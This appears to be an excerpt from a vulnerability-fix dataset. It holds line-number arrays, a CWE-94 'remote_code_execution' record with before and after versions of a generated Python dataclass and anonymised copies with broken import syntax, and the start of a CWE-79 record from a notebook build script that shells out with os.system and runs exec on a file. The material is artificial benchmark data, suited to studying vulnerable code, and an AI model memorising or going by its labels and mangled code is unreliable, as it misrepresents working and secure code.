2387,
2398,
2399,
2403,
2404,
2406,
2407,
2415,
2418,
2432,
2433,
2434,
2440,
2441,
2444,
2457,
2464,
2465,
2471,
2473,
2474,
2482,
2487,
2489,
2490,
2491,
2492,
2498,
2501,
2504,
2505,
2509,
2513,
2523,
2532,
2542,
2550,
2552,
2553,
2560,
2568,
2573,
2578,
2580,
2583,
2585,
2587,
2589,
2591,
2593,
2594,
2602,
2606,
2607,
2608,
2611,
2613,
2614,
2615,
2620,
2621,
2622,
2633,
2636,
2640,
2641,
2643,
2651,
2653,
2665,
2666,
2667,
2669,
2680,
2682,
2687,
2689,
2690,
2692,
2710,
2723,
2725,
2737,
2738,
2756,
2758,
2773,
2774,
2782,
2795,
2822,
2825,
2826,
2831,
2838,
2850,
2851,
2893,
2915,
2917,
2940,
2956,
2975,
2988,
3010,
3019,
3042,
3043,
3044,
3052,
3066,
3091,
3133,
3140,
3141,
3148,
3149,
3151,
3157,
3165,
3171,
3172,
3178,
3183,
3192,
3193,
3198,
3203,
3206,
3207,
3210,
3218,
3221,
3226,
3229,
3234,
3235,
3238,
3239,
3249,
3250,
3261,
3265,
3273,
3279,
3281,
3282,
3291,
3300,
3301,
3305,
3309,
3311,
3314,
3318,
3324,
3325,
3334,
3345,
3348,
3350,
3354,
3355,
3364,
3366,
3369,
3372,
3373,
3379,
3395,
3397,
3402,
3414,
3415,
3424,
3427,
3436,
3438,
3441,
3442,
3447,
3450,
3452,
3453,
3455,
3461,
3465,
3466,
3476,
3477,
3478,
3486,
3498,
3499,
3500,
3501,
3506,
3507,
3519,
3524,
3525,
3526,
3549,
3554,
3572,
3575,
3576,
3580,
3584,
3586,
3587,
3598,
3599,
3644,
3645,
3649,
3704,
3705,
3762,
3763,
3765,
3784,
3788,
3801,
3807,
3813,
3814,
3821,
3833,
3834,
3836,
3839,
3847,
3848,
3849,
3852,
3853,
3855,
3856,
3866,
3870,
3871,
3872,
3884,
3894,
3897,
3898,
3906,
3908,
3926,
3927,
3928,
3929,
3930,
3931,
3937,
3938,
3939,
3940,
3941,
3942,
3949,
3952,
3953,
3954,
3955,
3961,
3967,
3968,
3983,
3984,
3985,
3986,
3987,
3994,
4000,
4001,
4002,
4007,
4013,
4015,
4016,
4019,
4021,
4022,
4030,
4042,
4044,
4052,
4083,
4087,
4088,
4089,
4092,
4093,
4097,
4103,
4104,
4116,
4129,
4130,
4131,
4134,
4146,
4148,
4154,
4155,
4162,
4166,
4177,
4187,
4191,
4193,
4202,
4206,
4220,
4221,
4226,
4230,
4249,
4277,
4281,
4282,
4284,
4290,
4304,
4309,
4313,
4314,
4331,
4341,
4347,
4349,
4350,
4358,
4361,
4368,
4369,
4380,
4381,
4392,
4393,
4405,
4408,
4409,
4410,
4411,
4412,
4413,
4425,
4426,
4443,
4444,
4445,
4446,
4453,
4457,
4458,
4465,
4480,
4486,
4487,
4488,
4489,
4493,
4498,
4512,
4515,
4516,
4517,
4518,
4519,
4520,
4522,
4530,
4538,
4539,
4544,
4545,
4557,
4565,
4566,
4576,
4581,
4588,
4593,
4594,
4604,
4606,
4611,
4615,
4616,
4619,
4620,
4641,
4642,
4643,
4644,
4650,
4661,
4662,
4663,
4664,
4665,
4666,
4667,
4668,
4678,
4679,
4681,
4682,
4692,
4700,
4704,
4723,
4725,
4726,
4733,
4735,
4737,
4742,
4749,
4751,
4752,
4760,
4764,
4768,
4769,
4770,
4775,
4782,
4783,
4794,
4804,
4805,
4808,
4809,
4816,
4817,
4821,
4831,
4832,
4842,
4843,
4844,
4856,
4858,
4860,
4866,
4867,
4872,
4875,
4876,
4881,
4885,
4886,
4889,
4900,
4902,
4903,
4913,
4916,
4929,
4930,
4941,
4953,
4956,
4966,
4976,
4978,
4979,
4987,
4995,
5001,
5010,
20,
21,
22,
23,
142,
143,
144,
145,
146,
147,
148,
169,
170,
171,
172,
173,
174,
175,
206,
207,
208,
209,
210,
211,
212,
213,
214,
215,
216,
321,
330,
331,
332,
333,
334,
335,
342,
343,
344,
345,
346,
359,
360,
361,
362,
381,
382,
383,
384,
404,
405,
406,
407,
408,
409,
410,
411,
550,
551,
552,
553,
554,
555,
757,
758,
759,
760,
761,
762,
763,
764,
765,
874,
927,
967,
968,
969,
980,
981,
982,
983,
984,
1003,
1004,
1005,
1006,
1007,
1008,
1066,
1067,
1068,
1069,
1115,
1116,
1117,
1118,
1119,
1120,
1121,
1151,
1152,
1153,
1154,
1155,
1156,
1157,
1158,
1159,
1160,
1161,
1215,
1216,
1217,
1218,
1219,
1220,
1271,
1375,
1376,
1377,
1378,
1434,
1435,
1436,
1437,
1438,
1439,
1440,
1441,
1507,
1524,
1525,
1526,
1624,
1625,
1626,
1627,
1628,
1629,
1722,
1723,
1724,
1784,
1785,
1786,
1787,
1788,
1801,
1802,
1803,
1804,
2124,
2125,
2126,
2127,
2128,
2181,
2182,
2183,
2201,
2202,
2203,
2204,
2205,
2280,
2281,
2282,
2283,
2284,
2285,
2391,
2392,
2393,
2411,
2412,
2413,
2414,
2478,
2479,
2480,
2481,
2557,
2558,
2559,
2598,
2599,
2600,
2601,
2743,
2744,
2745,
2780,
2781,
2782,
2783,
2784,
2785,
2786,
2787,
2788,
2789,
2790,
2791,
2792,
2793,
3144,
3145,
3146,
3147,
3176,
3177,
3178,
3179,
3180,
3181,
3182,
3285,
3304,
3329,
3330,
3331,
3332,
3333,
3419,
3420,
3421,
3422,
3423,
3446,
3468,
3469,
3470,
3471,
3472,
3473,
3474,
3503,
3511,
3512,
3513,
3514,
3515,
3516,
3517,
3518,
3901,
3902,
3903,
3904,
3905,
3934,
3945,
3959,
3960,
3961,
3962,
3963,
3964,
4026,
4027,
4028,
4159,
4160,
4161,
4318,
4319,
4320,
4321,
4322,
4354,
4355,
4356,
4357,
4549,
4569,
4570,
4571,
4572,
4573,
4685,
4686,
4687,
4688,
4689,
4729,
4730,
4731,
4871,
4907,
4908,
4909,
4910,
4911,
4912,
4932,
4933,
4934,
4935,
4936,
4983,
4984,
4985,
4986,
222,
223,
224,
228,
229,
230,
231,
232,
263,
264,
265,
266,
267,
268,
269,
270,
271
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
24,
39,
41,
44,
48,
50,
67,
68,
80,
85,
87,
91,
93,
108,
125,
127,
132,
134,
136,
137,
138,
140,
141,
146,
155,
156,
160,
161,
167,
168,
173,
178,
179,
189,
190,
191,
192,
193,
194,
199,
209,
211,
212,
213,
214,
215,
216,
229,
232,
238,
245,
246,
247,
248,
249,
257,
260,
262,
263,
275,
281,
302,
305,
311,
329,
331,
332,
336,
337,
338,
340,
341,
354,
355,
371,
372,
392,
393,
400,
414,
415,
416,
418,
428,
436,
438,
439,
441,
442,
447,
448,
450,
451,
453,
458,
459,
461,
462,
465,
466,
472,
473,
474,
478,
479,
481,
485,
486,
490,
496,
505,
508,
513,
515,
519,
521,
522,
531,
553,
555,
556,
561,
562,
572,
585,
588,
596,
597,
600,
607,
609,
619,
621,
622,
625,
630,
632,
636,
643,
650,
651,
654,
662,
663,
664,
665,
666,
667,
668,
671,
674,
682,
683,
692,
693,
701,
702,
711,
722,
738,
740,
741,
744,
752,
755,
757,
767,
769,
770,
780,
782,
795,
798,
799,
800,
801,
802,
804,
806,
826,
828,
829,
832,
840,
843,
845,
855,
857,
858,
861,
868,
869,
870,
873,
875,
885,
887,
888,
896,
897,
898,
914,
917,
919,
920,
931,
933,
940,
941,
946,
947,
980,
981,
992,
993,
1005,
1009,
1011,
1016,
1017,
1025,
1027,
1028,
1029,
1030,
1039,
1045,
1051,
1053,
1060,
1062,
1069,
1070,
1077,
1079,
1080,
1086,
1088,
1089,
1090,
1105,
1109,
1110,
1114,
1122,
1123,
1125,
1127,
1128,
1135,
1144,
1149,
1161,
1163,
1164,
1170,
1174,
1178,
1187,
1188,
1199,
1202,
1220,
1221,
1228,
1229,
1237,
1249,
1251,
1265,
1266,
1282,
1284,
1285,
1288,
1293,
1295,
1303,
1308,
1315,
1317,
1318,
1321,
1332,
1335,
1350,
1352,
1353,
1356,
1364,
1365,
1366,
1367,
1368,
1370,
1374,
1384,
1386,
1387,
1395,
1396,
1398,
1399,
1400,
1405,
1410,
1411,
1413,
1415,
1416,
1424,
1425,
1433,
1441,
1445,
1446,
1458,
1471,
1477,
1484,
1485,
1487,
1491,
1492,
1493,
1498,
1506,
1507,
1514,
1516,
1518,
1519,
1524,
1525,
1528,
1532,
1535,
1536,
1544,
1546,
1554,
1558,
1563,
1575,
1576,
1579,
1580,
1581,
1592,
1593,
1594,
1622,
1624,
1626,
1635,
1636,
1646,
1647,
1649,
1651,
1652,
1673,
1674,
1675,
1686,
1698,
1721,
1728,
1733,
1734,
1742,
1743,
1745,
1751,
1755,
1759,
1763,
1764,
1788,
1795,
1796,
1806,
1810,
1811,
1832,
1843,
1847,
1848,
1852,
1875,
1900,
1916,
1942,
1943,
1954,
1968,
1970,
1975,
1978,
1998,
2010,
2013,
2041,
2046,
2060,
2080,
2081,
2096,
2097,
2101,
2105,
2117,
2120,
2121,
2122,
2123,
2124,
2125,
2126,
2127,
2128,
2129,
2130,
2131,
2132,
2133,
2134,
2135,
2136,
2137,
2138,
2194,
2195,
2212,
2213,
2222,
2224,
2225,
2242,
2243,
2253,
2266,
2291,
2292,
2314,
2315,
2316,
2321,
2325,
2326,
2327,
2349,
2358,
2365,
2366,
2371,
2373,
2375,
2378,
2383,
2395,
2402,
2403,
2414,
2415,
2419,
2420,
2422,
2423,
2431,
2434,
2448,
2449,
2450,
2456,
2457,
2460,
2473,
2480,
2481,
2487,
2489,
2490,
2498,
2503,
2505,
2506,
2507,
2508,
2514,
2517,
2520,
2521,
2525,
2529,
2539,
2548,
2558,
2566,
2568,
2569,
2576,
2584,
2589,
2594,
2596,
2599,
2601,
2603,
2605,
2607,
2609,
2610,
2618,
2622,
2623,
2624,
2627,
2629,
2630,
2631,
2636,
2637,
2638,
2649,
2652,
2656,
2657,
2659,
2667,
2669,
2681,
2682,
2683,
2685,
2696,
2698,
2703,
2705,
2706,
2708,
2726,
2739,
2741,
2753,
2754,
2772,
2774,
2789,
2790,
2798,
2811,
2838,
2841,
2842,
2847,
2854,
2866,
2867,
2890,
2892,
2915,
2931,
2950,
2963,
2985,
2994,
3017,
3018,
3019,
3027,
3041,
3066,
3108,
3115,
3116,
3123,
3124,
3126,
3132,
3140,
3146,
3147,
3153,
3158,
3167,
3168,
3173,
3178,
3181,
3182,
3185,
3193,
3196,
3201,
3204,
3209,
3210,
3213,
3214,
3224,
3225,
3236,
3240,
3248,
3254,
3256,
3257,
3266,
3275,
3276,
3280,
3284,
3286,
3289,
3293,
3299,
3300,
3309,
3320,
3323,
3325,
3329,
3330,
3339,
3341,
3344,
3347,
3348,
3354,
3370,
3372,
3377,
3389,
3390,
3399,
3402,
3411,
3413,
3416,
3417,
3422,
3425,
3427,
3428,
3430,
3436,
3440,
3441,
3451,
3452,
3453,
3461,
3473,
3474,
3475,
3476,
3481,
3482,
3494,
3499,
3500,
3501,
3524,
3529,
3547,
3550,
3551,
3555,
3559,
3561,
3562,
3573,
3574,
3619,
3620,
3624,
3679,
3680,
3737,
3738,
3740,
3759,
3763,
3776,
3782,
3788,
3789,
3796,
3808,
3809,
3811,
3814,
3822,
3823,
3824,
3827,
3828,
3830,
3831,
3841,
3845,
3846,
3847,
3859,
3869,
3872,
3873,
3881,
3883,
3901,
3902,
3903,
3904,
3905,
3906,
3912,
3913,
3914,
3915,
3916,
3917,
3924,
3927,
3928,
3929,
3930,
3936,
3942,
3943,
3958,
3959,
3960,
3961,
3962,
3969,
3975,
3976,
3977,
3982,
3988,
3990,
3991,
3994,
3996,
3997,
4005,
4017,
4019,
4027,
4058,
4062,
4063,
4064,
4067,
4068,
4072,
4078,
4079,
4091,
4104,
4105,
4106,
4109,
4121,
4123,
4129,
4130,
4137,
4141,
4152,
4162,
4166,
4168,
4177,
4181,
4195,
4196,
4201,
4205,
4224,
4252,
4256,
4257,
4259,
4265,
4279,
4284,
4288,
4289,
4306,
4316,
4322,
4324,
4325,
4333,
4336,
4343,
4344,
4355,
4356,
4367,
4368,
4380,
4383,
4384,
4385,
4386,
4387,
4388,
4400,
4401,
4418,
4419,
4420,
4421,
4428,
4432,
4433,
4440,
4455,
4461,
4462,
4463,
4464,
4468,
4473,
4487,
4490,
4491,
4492,
4493,
4494,
4495,
4497,
4505,
4513,
4514,
4519,
4520,
4532,
4540,
4541,
4551,
4556,
4563,
4568,
4569,
4579,
4581,
4586,
4590,
4591,
4594,
4595,
4616,
4617,
4618,
4619,
4625,
4636,
4637,
4638,
4639,
4640,
4641,
4642,
4643,
4653,
4654,
4656,
4657,
4667,
4675,
4679,
4698,
4700,
4701,
4708,
4710,
4712,
4717,
4724,
4726,
4727,
4735,
4739,
4743,
4744,
4745,
4750,
4757,
4758,
4769,
4779,
4780,
4783,
4784,
4791,
4792,
4796,
4806,
4807,
4817,
4818,
4819,
4831,
4833,
4835,
4841,
4842,
4847,
4850,
4851,
4856,
4860,
4861,
4864,
4875,
4877,
4878,
4888,
4891,
4904,
4905,
4916,
4928,
4931,
4941,
4951,
4953,
4954,
4962,
4970,
4976,
4985,
20,
21,
22,
23,
143,
144,
145,
146,
147,
148,
149,
170,
171,
172,
173,
174,
175,
176,
181,
182,
183,
184,
185,
218,
219,
220,
221,
222,
223,
224,
225,
226,
227,
228,
335,
344,
345,
346,
347,
348,
349,
357,
358,
359,
360,
361,
374,
375,
376,
377,
396,
397,
398,
399,
419,
420,
421,
422,
423,
424,
425,
426,
566,
567,
568,
569,
570,
571,
773,
774,
775,
776,
777,
778,
779,
780,
781,
890,
943,
983,
984,
985,
996,
997,
998,
999,
1000,
1019,
1020,
1021,
1022,
1023,
1024,
1082,
1083,
1084,
1085,
1131,
1132,
1133,
1134,
1135,
1136,
1137,
1167,
1168,
1169,
1170,
1171,
1172,
1173,
1174,
1175,
1176,
1177,
1231,
1232,
1233,
1234,
1235,
1236,
1287,
1391,
1392,
1393,
1394,
1450,
1451,
1452,
1453,
1454,
1455,
1456,
1457,
1523,
1540,
1541,
1542,
1640,
1641,
1642,
1643,
1644,
1645,
1738,
1739,
1740,
1800,
1801,
1802,
1803,
1804,
1817,
1818,
1819,
1820,
2140,
2141,
2142,
2143,
2144,
2197,
2198,
2199,
2217,
2218,
2219,
2220,
2221,
2296,
2297,
2298,
2299,
2300,
2301,
2407,
2408,
2409,
2427,
2428,
2429,
2430,
2494,
2495,
2496,
2497,
2573,
2574,
2575,
2614,
2615,
2616,
2617,
2759,
2760,
2761,
2796,
2797,
2798,
2799,
2800,
2801,
2802,
2803,
2804,
2805,
2806,
2807,
2808,
2809,
3119,
3120,
3121,
3122,
3151,
3152,
3153,
3154,
3155,
3156,
3157,
3260,
3279,
3304,
3305,
3306,
3307,
3308,
3394,
3395,
3396,
3397,
3398,
3421,
3443,
3444,
3445,
3446,
3447,
3448,
3449,
3478,
3486,
3487,
3488,
3489,
3490,
3491,
3492,
3493,
3876,
3877,
3878,
3879,
3880,
3909,
3920,
3934,
3935,
3936,
3937,
3938,
3939,
4001,
4002,
4003,
4134,
4135,
4136,
4293,
4294,
4295,
4296,
4297,
4329,
4330,
4331,
4332,
4524,
4544,
4545,
4546,
4547,
4548,
4660,
4661,
4662,
4663,
4664,
4704,
4705,
4706,
4846,
4882,
4883,
4884,
4885,
4886,
4887,
4907,
4908,
4909,
4910,
4911,
4958,
4959,
4960,
4961,
234,
235,
236,
240,
241,
242,
243,
244,
277,
278,
279,
280,
281,
282,
283,
284,
285
] |
5CWE-94
| from __future__ import annotations
from dataclasses import dataclass, field
from datetime import date, datetime
from typing import Any, Dict, List, Optional, Union, cast
from .an_enum import AnEnum
from .different_enum import DifferentEnum
@dataclass
class AModel:
""" A Model for testing all the ways custom objects can be used """
an_enum_value: AnEnum
a_camel_date_time: Union[datetime, date]
a_date: date
nested_list_of_enums: Optional[List[List[DifferentEnum]]] = field(
default_factory=lambda: cast(Optional[List[List[DifferentEnum]]], [])
)
some_dict: Optional[Dict[Any, Any]] = field(default_factory=lambda: cast(Optional[Dict[Any, Any]], {}))
def to_dict(self) -> Dict[str, Any]:
an_enum_value = self.an_enum_value.value
if isinstance(self.a_camel_date_time, datetime):
a_camel_date_time = self.a_camel_date_time.isoformat()
else:
a_camel_date_time = self.a_camel_date_time.isoformat()
a_date = self.a_date.isoformat()
if self.nested_list_of_enums is None:
nested_list_of_enums = None
else:
nested_list_of_enums = []
for nested_list_of_enums_item_data in self.nested_list_of_enums:
nested_list_of_enums_item = []
for nested_list_of_enums_item_item_data in nested_list_of_enums_item_data:
nested_list_of_enums_item_item = nested_list_of_enums_item_item_data.value
nested_list_of_enums_item.append(nested_list_of_enums_item_item)
nested_list_of_enums.append(nested_list_of_enums_item)
some_dict = self.some_dict
return {
"an_enum_value": an_enum_value,
"aCamelDateTime": a_camel_date_time,
"a_date": a_date,
"nested_list_of_enums": nested_list_of_enums,
"some_dict": some_dict,
}
@staticmethod
def from_dict(d: Dict[str, Any]) -> AModel:
an_enum_value = AnEnum(d["an_enum_value"])
def _parse_a_camel_date_time(data: Dict[str, Any]) -> Union[datetime, date]:
a_camel_date_time: Union[datetime, date]
try:
a_camel_date_time = datetime.fromisoformat(d["aCamelDateTime"])
return a_camel_date_time
except:
pass
a_camel_date_time = date.fromisoformat(d["aCamelDateTime"])
return a_camel_date_time
a_camel_date_time = _parse_a_camel_date_time(d["aCamelDateTime"])
a_date = date.fromisoformat(d["a_date"])
nested_list_of_enums = []
for nested_list_of_enums_item_data in d.get("nested_list_of_enums") or []:
nested_list_of_enums_item = []
for nested_list_of_enums_item_item_data in nested_list_of_enums_item_data:
nested_list_of_enums_item_item = DifferentEnum(nested_list_of_enums_item_item_data)
nested_list_of_enums_item.append(nested_list_of_enums_item_item)
nested_list_of_enums.append(nested_list_of_enums_item)
some_dict = d.get("some_dict")
return AModel(
an_enum_value=an_enum_value,
a_camel_date_time=a_camel_date_time,
a_date=a_date,
nested_list_of_enums=nested_list_of_enums,
some_dict=some_dict,
)
| from __future__ import annotations
import datetime
from dataclasses import dataclass, field
from typing import Any, Dict, List, Optional, Union, cast
from .an_enum import AnEnum
from .different_enum import DifferentEnum
@dataclass
class AModel:
""" A Model for testing all the ways custom objects can be used """
an_enum_value: AnEnum
some_dict: Dict[Any, Any]
a_camel_date_time: Union[datetime.datetime, datetime.date]
a_date: datetime.date
nested_list_of_enums: Optional[List[List[DifferentEnum]]] = field(
default_factory=lambda: cast(Optional[List[List[DifferentEnum]]], [])
)
def to_dict(self) -> Dict[str, Any]:
an_enum_value = self.an_enum_value.value
some_dict = self.some_dict
if isinstance(self.a_camel_date_time, datetime.datetime):
a_camel_date_time = self.a_camel_date_time.isoformat()
else:
a_camel_date_time = self.a_camel_date_time.isoformat()
a_date = self.a_date.isoformat()
if self.nested_list_of_enums is None:
nested_list_of_enums = None
else:
nested_list_of_enums = []
for nested_list_of_enums_item_data in self.nested_list_of_enums:
nested_list_of_enums_item = []
for nested_list_of_enums_item_item_data in nested_list_of_enums_item_data:
nested_list_of_enums_item_item = nested_list_of_enums_item_item_data.value
nested_list_of_enums_item.append(nested_list_of_enums_item_item)
nested_list_of_enums.append(nested_list_of_enums_item)
return {
"an_enum_value": an_enum_value,
"some_dict": some_dict,
"aCamelDateTime": a_camel_date_time,
"a_date": a_date,
"nested_list_of_enums": nested_list_of_enums,
}
@staticmethod
def from_dict(d: Dict[str, Any]) -> AModel:
an_enum_value = AnEnum(d["an_enum_value"])
some_dict = d["some_dict"]
def _parse_a_camel_date_time(data: Dict[str, Any]) -> Union[datetime.datetime, datetime.date]:
a_camel_date_time: Union[datetime.datetime, datetime.date]
try:
a_camel_date_time = datetime.datetime.fromisoformat(d["aCamelDateTime"])
return a_camel_date_time
except:
pass
a_camel_date_time = datetime.date.fromisoformat(d["aCamelDateTime"])
return a_camel_date_time
a_camel_date_time = _parse_a_camel_date_time(d["aCamelDateTime"])
a_date = datetime.date.fromisoformat(d["a_date"])
nested_list_of_enums = []
for nested_list_of_enums_item_data in d.get("nested_list_of_enums") or []:
nested_list_of_enums_item = []
for nested_list_of_enums_item_item_data in nested_list_of_enums_item_data:
nested_list_of_enums_item_item = DifferentEnum(nested_list_of_enums_item_item_data)
nested_list_of_enums_item.append(nested_list_of_enums_item_item)
nested_list_of_enums.append(nested_list_of_enums_item)
return AModel(
an_enum_value=an_enum_value,
some_dict=some_dict,
a_camel_date_time=a_camel_date_time,
a_date=a_date,
nested_list_of_enums=nested_list_of_enums,
)
| remote_code_execution | {
"code": [
"from datetime import date, datetime",
" a_camel_date_time: Union[datetime, date]",
" a_date: date",
" some_dict: Optional[Dict[Any, Any]] = field(default_factory=lambda: cast(Optional[Dict[Any, Any]], {}))",
" if isinstance(self.a_camel_date_time, datetime):",
" some_dict = self.some_dict",
" \"some_dict\": some_dict,",
" def _parse_a_camel_date_time(data: Dict[str, Any]) -> Union[datetime, date]:",
" a_camel_date_time: Union[datetime, date]",
" a_camel_date_time = datetime.fromisoformat(d[\"aCamelDateTime\"])",
" a_camel_date_time = date.fromisoformat(d[\"aCamelDateTime\"])",
" a_date = date.fromisoformat(d[\"a_date\"])",
" some_dict = d.get(\"some_dict\")",
" some_dict=some_dict,"
],
"line_no": [
4,
16,
17,
21,
26,
47,
54,
61,
62,
64,
69,
75,
87,
94
]
} | {
"code": [
"import datetime",
" some_dict: Dict[Any, Any]",
" a_camel_date_time: Union[datetime.datetime, datetime.date]",
" a_date: datetime.date",
" some_dict = self.some_dict",
" \"some_dict\": some_dict,",
" some_dict = d[\"some_dict\"]",
" def _parse_a_camel_date_time(data: Dict[str, Any]) -> Union[datetime.datetime, datetime.date]:",
" a_camel_date_time: Union[datetime.datetime, datetime.date]",
" a_camel_date_time = datetime.datetime.fromisoformat(d[\"aCamelDateTime\"])",
" a_camel_date_time = datetime.date.fromisoformat(d[\"aCamelDateTime\"])",
" a_date = datetime.date.fromisoformat(d[\"a_date\"])",
" some_dict=some_dict,"
],
"line_no": [
3,
16,
17,
18,
26,
51,
61,
63,
64,
66,
71,
77,
91
]
} | from __future__ import annotations
from dataclasses import .dataclass, field
from datetime import .date, datetime
from typing import Any, Dict, List, Optional, Union, cast
from .an_enum import AnEnum
from .different_enum import DifferentEnum
@dataclass
class CLASS_0:
VAR_1: AnEnum
VAR_5: Union[datetime, date]
VAR_2: date
VAR_6: Optional[List[List[DifferentEnum]]] = field(
default_factory=lambda: cast(Optional[List[List[DifferentEnum]]], [])
)
VAR_3: Optional[Dict[Any, Any]] = field(default_factory=lambda: cast(Optional[Dict[Any, Any]], {}))
def FUNC_0(self) -> Dict[str, Any]:
VAR_1 = self.an_enum_value.value
if isinstance(self.a_camel_date_time, datetime):
VAR_5 = self.a_camel_date_time.isoformat()
else:
VAR_5 = self.a_camel_date_time.isoformat()
VAR_2 = self.a_date.isoformat()
if self.nested_list_of_enums is None:
VAR_6 = None
else:
VAR_6 = []
for nested_list_of_enums_item_data in self.nested_list_of_enums:
VAR_7 = []
for nested_list_of_enums_item_item_data in nested_list_of_enums_item_data:
VAR_8 = nested_list_of_enums_item_item_data.value
VAR_7.append(VAR_8)
VAR_6.append(VAR_7)
VAR_3 = self.some_dict
return {
"an_enum_value": VAR_1,
"aCamelDateTime": VAR_5,
"a_date": VAR_2,
"nested_list_of_enums": VAR_6,
"some_dict": VAR_3,
}
@staticmethod
def FUNC_1(VAR_0: Dict[str, Any]) -> CLASS_0:
VAR_1 = AnEnum(VAR_0["an_enum_value"])
def FUNC_2(VAR_4: Dict[str, Any]) -> Union[datetime, date]:
VAR_5: Union[datetime, date]
try:
VAR_5 = datetime.fromisoformat(VAR_0["aCamelDateTime"])
return VAR_5
except:
pass
VAR_5 = date.fromisoformat(VAR_0["aCamelDateTime"])
return VAR_5
a_camel_date_time = FUNC_2(VAR_0["aCamelDateTime"])
VAR_2 = date.fromisoformat(VAR_0["a_date"])
VAR_6 = []
for nested_list_of_enums_item_data in VAR_0.get("nested_list_of_enums") or []:
VAR_7 = []
for nested_list_of_enums_item_item_data in nested_list_of_enums_item_data:
VAR_8 = DifferentEnum(nested_list_of_enums_item_item_data)
VAR_7.append(VAR_8)
VAR_6.append(VAR_7)
VAR_3 = VAR_0.get("some_dict")
return CLASS_0(
VAR_1=an_enum_value,
VAR_5=a_camel_date_time,
VAR_2=a_date,
VAR_6=nested_list_of_enums,
VAR_3=some_dict,
)
| from __future__ import annotations
import .datetime
from dataclasses import .dataclass, field
from typing import Any, Dict, List, Optional, Union, cast
from .an_enum import AnEnum
from .different_enum import DifferentEnum
@dataclass
class CLASS_0:
VAR_1: AnEnum
VAR_2: Dict[Any, Any]
VAR_5: Union[datetime.datetime, datetime.date]
VAR_3: datetime.date
VAR_6: Optional[List[List[DifferentEnum]]] = field(
default_factory=lambda: cast(Optional[List[List[DifferentEnum]]], [])
)
def FUNC_0(self) -> Dict[str, Any]:
VAR_1 = self.an_enum_value.value
VAR_2 = self.some_dict
if isinstance(self.a_camel_date_time, datetime.datetime):
VAR_5 = self.a_camel_date_time.isoformat()
else:
VAR_5 = self.a_camel_date_time.isoformat()
VAR_3 = self.a_date.isoformat()
if self.nested_list_of_enums is None:
VAR_6 = None
else:
VAR_6 = []
for nested_list_of_enums_item_data in self.nested_list_of_enums:
VAR_7 = []
for nested_list_of_enums_item_item_data in nested_list_of_enums_item_data:
VAR_8 = nested_list_of_enums_item_item_data.value
VAR_7.append(VAR_8)
VAR_6.append(VAR_7)
return {
"an_enum_value": VAR_1,
"some_dict": VAR_2,
"aCamelDateTime": VAR_5,
"a_date": VAR_3,
"nested_list_of_enums": VAR_6,
}
@staticmethod
def FUNC_1(VAR_0: Dict[str, Any]) -> CLASS_0:
VAR_1 = AnEnum(VAR_0["an_enum_value"])
VAR_2 = VAR_0["some_dict"]
def FUNC_2(VAR_4: Dict[str, Any]) -> Union[datetime.datetime, datetime.date]:
VAR_5: Union[datetime.datetime, datetime.date]
try:
VAR_5 = datetime.datetime.fromisoformat(VAR_0["aCamelDateTime"])
return VAR_5
except:
pass
VAR_5 = datetime.date.fromisoformat(VAR_0["aCamelDateTime"])
return VAR_5
a_camel_date_time = FUNC_2(VAR_0["aCamelDateTime"])
VAR_3 = datetime.date.fromisoformat(VAR_0["a_date"])
VAR_6 = []
for nested_list_of_enums_item_data in VAR_0.get("nested_list_of_enums") or []:
VAR_7 = []
for nested_list_of_enums_item_item_data in nested_list_of_enums_item_data:
VAR_8 = DifferentEnum(nested_list_of_enums_item_item_data)
VAR_7.append(VAR_8)
VAR_6.append(VAR_7)
return CLASS_0(
VAR_1=an_enum_value,
VAR_2=some_dict,
VAR_5=a_camel_date_time,
VAR_3=a_date,
VAR_6=nested_list_of_enums,
)
| [
2,
6,
9,
10,
14,
22,
25,
28,
31,
33,
42,
44,
46,
48,
56,
60,
65,
70,
72,
74,
76,
82,
84,
86,
88,
96,
13
] | [
2,
6,
9,
10,
14,
22,
25,
27,
30,
33,
35,
44,
46,
48,
56,
60,
62,
67,
72,
74,
76,
78,
84,
86,
88,
96,
13
] |
1CWE-79
| """
This module defines the things that are used in setup.py for building the notebook
This includes:
* Functions for finding things like packages, package data, etc.
* A function for checking dependencies.
"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
import os
import re
import pipes
import shutil
import sys
from distutils import log
from distutils.cmd import Command
from fnmatch import fnmatch
from glob import glob
from multiprocessing.pool import ThreadPool
from subprocess import check_call
if sys.platform == 'win32':
from subprocess import list2cmdline
else:
def list2cmdline(cmd_list):
return ' '.join(map(pipes.quote, cmd_list))
#-------------------------------------------------------------------------------
# Useful globals and utility functions
#-------------------------------------------------------------------------------
# A few handy globals
isfile = os.path.isfile
pjoin = os.path.join
repo_root = os.path.dirname(os.path.abspath(__file__))
is_repo = os.path.isdir(pjoin(repo_root, '.git'))
def oscmd(s):
print(">", s)
os.system(s)
# Py3 compatibility hacks, without assuming IPython itself is installed with
# the full py3compat machinery.
try:
execfile
except NameError:
def execfile(fname, globs, locs=None):
locs = locs or globs
exec(compile(open(fname).read(), fname, "exec"), globs, locs)
#---------------------------------------------------------------------------
# Basic project information
#---------------------------------------------------------------------------
name = 'notebook'
# release.py contains version, authors, license, url, keywords, etc.
version_ns = {}
execfile(pjoin(repo_root, name, '_version.py'), version_ns)
version = version_ns['__version__']
# vendored from pep440 package, we allow `.dev` suffix without trailing number.
loose_pep440re = re.compile(r'^([1-9]\d*!)?(0|[1-9]\d*)(\.(0|[1-9]\d*))*((a|b|rc)(0|[1-9]\d*))?(\.post(0|[1-9]\d*))?(\.dev(0|[1-9]\d*)?)?$')
if not loose_pep440re.match(version):
raise ValueError('Invalid version number `%s`, please follow pep440 convention or pip will get confused about which package is more recent.' % version)
#---------------------------------------------------------------------------
# Find packages
#---------------------------------------------------------------------------
def find_packages():
"""
Find all of the packages.
"""
packages = []
for dir,subdirs,files in os.walk(name):
package = dir.replace(os.path.sep, '.')
if '__init__.py' not in files:
# not a package
continue
packages.append(package)
return packages
#---------------------------------------------------------------------------
# Find package data
#---------------------------------------------------------------------------
def find_package_data():
"""
Find package_data.
"""
# This is not enough for these things to appear in a sdist.
# We need to muck with the MANIFEST to get this to work
# exclude components and less from the walk;
# we will build the components separately
excludes = [
pjoin('static', 'components'),
pjoin('static', '*', 'less'),
pjoin('static', '*', 'node_modules')
]
# walk notebook resources:
cwd = os.getcwd()
os.chdir('notebook')
static_data = []
for parent, dirs, files in os.walk('static'):
if any(fnmatch(parent, pat) for pat in excludes):
# prevent descending into subdirs
dirs[:] = []
continue
for f in files:
static_data.append(pjoin(parent, f))
# for verification purposes, explicitly add main.min.js
